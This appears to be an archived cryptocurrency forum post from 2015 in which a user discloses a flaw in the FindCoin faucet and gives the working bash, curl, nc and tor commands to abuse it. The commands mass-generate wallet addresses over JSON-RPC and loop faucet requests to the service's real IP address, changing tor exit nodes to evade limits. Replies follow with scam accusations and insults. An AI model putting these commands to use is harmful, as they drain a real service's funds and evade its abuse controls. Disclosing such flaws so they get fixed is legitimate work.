Ninjastic
PostEdited versionsQuotes to this post
Post
Topic
Board Announcements (Altcoins)
Re: [ANN][FIND] FindCoin | Community Anti-Scam Token | Faucet Distribution
by
548845
on 01/01/2015, 17:05:05 UTC
Quote from: Brah on January 01, 2015, 04:59:35 PM
Quote from: johnbrainless on January 01, 2015, 02:01:58 PM
Quote from: fenghush on January 01, 2015, 11:22:26 AM
I PM'ed most of the devs about a sensitive info leak in the debug.log file on the 27th Dec
http://i.imgur.com/gtkGBMg.png

This allows anyone with a bunch of addresses in their wallet to make a ton of request to http://104.236.75.141:1532/findcoin/get/$address and everyone would be none the wiser thinking those requests came from actual wallets, rather than lets say curl over tor which I will demonstrate bellow.

Due to sloppy programming, no SSL, no special 'secret' parameters exchanged between the wallet and the faucet service and no IP filtering it is trivial to simulate the request the actual wallet makes with a bit of bash, curl and tor.

First start tor with the --controlport 9051 flag so we can request a new exit node by sending the 'newnym' signal

Code:
/path/to/tor --controlport 9051 &
Next we need a bunch of addresses. Since there is no command line version of the FindCoin wallet this is a bit inconvenient but still trivial to do with one command.
First edit ~/.FindCoin/FindCoin.conf to become a JSON-RPC service and restart the wallet
Code:
rpcuser=user
rpcpassword=p
rpcallowip=127.0.0.1
rpcport=13333
listen=1
server=1
Then simply send the getnewaddress jsonrpc command to the wallet's rpc port over and over again until you're fed up with it
Code:
while true;do curl --data-binary '{"jsonrpc":"1.0","id":"curltext","method":"getnewaddress","params":[]}' -H 'content-type:text/plain;' -s http://user:p@127.0.0.1:13333/ | awk -F'"' '{print $4}' >> addresses;done
This will write indefinite amount of addresses until ctrl+c'ed to a file named addresses.

Now we simply loop over each address and make requests to the faucet url requesting a new exit tor node after each request
Code:
while read address;do (echo authenticate '""'; echo signal newnym; echo quit) | nc 127.0.0.1 9051;curl --socks5 127.0.0.1:9050 http://104.236.75.141:1532/findcoin/get/$address;sleep 10;done < addresses
And presto you make as many requests to the faucet url as you have addresses over tor, with a new IP between each request. No VMs, no proxies, no extra wallets.

we now can rename this coin to failcoin. byebye people

Yep, yet these skids are pointing their finger towards VPS users when it wasnt it.

http://www.popcrunch.com/wp-content/uploads/2010/12/bowl.jpg

Yep, ask the dev team how many coins they scammed out of the legal FindYouCoins owners....